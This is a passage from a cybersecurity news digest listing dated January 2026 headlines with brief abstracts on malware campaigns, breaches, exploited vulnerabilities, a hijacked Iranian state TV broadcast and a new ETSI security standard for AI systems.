The Evelyn Stealer campaign targets software developers by exploiting the Visual Studio Code (VSC) extension ecosystem. This sophisticated attack chain involves a multistage delivery method designed to exfiltrate sensitive information.Trend Micro
January 19, 2026 – Attack
Hacktivists hijacked Iran ’s state TV to air anti-regime messages and an appeal to protest from Reza Pahlavi Full Text
Abstract
Anti-regime activists hijacked Iran’s Badr satellite and briefly took control of state TV channels to broadcast messages from Crown Prince Reza Pahlavi, calling for protests against the Islamic Republic.Security Affairs
January 19, 2026 – Breach
StealC hackers hacked as researchers hijack malware control panels Full Text
Abstract
An XSS vulnerability in the StealC malware's control panel has been exploited by researchers to gather intelligence on the malware operators. This flaw allowed researchers to hijack sessions and collect data on the attackers' hardware and location.Bleeping Computer
January 19, 2026 – General
Global tensions are pushing cyber activity toward dangerous territory Full Text
Abstract
The intersection of cybersecurity and geopolitics is becoming increasingly pronounced, with state-sponsored cyber operations being used as tools of political influence and conflict.Help Net Security
January 19, 2026 – Policy and Law
A new European standard outlines security requirements for AI Full Text
Abstract
The European Telecommunications Standards Institute (ETSI) has introduced a new standard, ETSI EN 304 223, to address cybersecurity requirements for AI models and systems. This standard is crucial for security teams working with AI.Help Net Security
January 19, 2026 – General
When the Olympics connect everything, attackers pay attention Full Text
Abstract
The Milan Cortina 2026 Winter Olympic Games present a significant cybersecurity challenge. This includes temporary networks, pop-up systems, and numerous partnerships, all of which create a target-rich environment for cyber threat actors.Help Net Security
January 19, 2026 – Breach
Canadian investment regulator confirms hackers hit 750,000 investors Full Text
Abstract
The Canadian Investment Regulatory Organization (CIRO) has confirmed a data breach affecting approximately 750,000 investors due to a sophisticated phishing attack. CIRO confirmed that login credentials were not at risk during the breach.The Record
January 17, 2026 – APT
China-Linked APT Exploits Sitecore Zero-Day in Attacks on American Critical Infrastructure Full Text
Abstract
A China-linked advanced persistent threat (APT) group, identified as UAT-8837, has been exploiting a critical zero-day vulnerability in Sitecore (CVE-2025-53690, CVSS score: 9.0) to target critical infrastructure sectors in North America.The Hacker News
January 17, 2026 – Vulnerabilities
Critical Vulnerability in Festo Firmware Affects Multiple Products Full Text
Abstract
A critical vulnerability has been identified in the firmware of multiple Festo products, affecting a wide range of devices used in critical manufacturing sectors globally. The vulnerability is tracked as CVE-2022-3270.CISA
January 17, 2026 – Vulnerabilities
Bankrupt scooter startup’s single key controlled everything Full Text
Abstract
An Estonian e-scooter company, Äike, which has gone bankrupt, left a significant security flaw in its devices. The scooters were shipped with a default private key that was never individualized, allowing any scooter to be unlocked using the same key.The Register
January 17, 2026 – Botnet
RondoDox botnet exploits critical HPE OneView bug Full Text
Abstract
A critical vulnerability in HPE OneView, identified as CVE-2025-37164, is being exploited at scale by the RondoDox botnet. This remote code execution flaw has a perfect 10 CVSS severity score.The Register
January 17, 2026 – Attack
TamperedChef serves bad ads, with infostealers as the main course Full Text
Abstract
The TamperedChef campaign is a sophisticated malvertising operation leveraging Google Ads to distribute infostealer. This campaign targets users searching for PDF software, redirecting them to malicious sites.Sophos
January 16, 2026 – Vulnerabilities
Years-Old Vulnerable Apache Struts 2 Versions See 387K Weekly Downloads Full Text
Abstract
A critical vulnerability, CVE-2025-68493, has been identified in Apache Struts 2, affecting versions 2.0.0 through 6.1.0. This flaw, discovered by Zast AI, involves unsafe XML parsing in the XWork component, which can lead to system crashes.Hack Read
January 16, 2026 – Breach
Texas behavioral health center warns patients of data breach that leaked SSNs, medical info Full Text
Abstract
Spindletop Center, a behavioral health clinic in Texas, experienced a significant data breach in September 2025. Rhysida ransomware claimed responsibility for the attack, demanding a ransom of 15 bitcoin, equivalent to $1.65 million at the time.CompariTech
January 16, 2026 – Malware
GhostPoster Browser Malware Hid for 5 Years With 840,000 Installs Full Text
Abstract
The GhostPoster malware campaign has been active for five years, affecting over 840,000 users through browser extensions on Chrome, Firefox, and Edge. The malware uses hidden payloads within PNG images to evade detection.Hack Read
January 16, 2026 – Phishing
China spies used Maduro capture as lure to phish US agencies Full Text
Abstract
Chinese cyberspies, identified as the Mustang Panda group, have launched a targeted phishing campaign against US government agencies. The campaign used the geopolitical event of Venezuelan President Nicolás Maduro's capture as a lure.The Register
January 16, 2026 – Vulnerabilities
CISA’s secure-software buying tool had a simple XSS vulnerability of its own Full Text
Abstract
An XSS vulnerability was discovered in CISA's "Software Acquisition Guide: Supplier Response Web Tool." This vulnerability allowed attackers to inject malicious JavaScript into the web page, potentially affecting other users and defacing the website.Cyber Scoop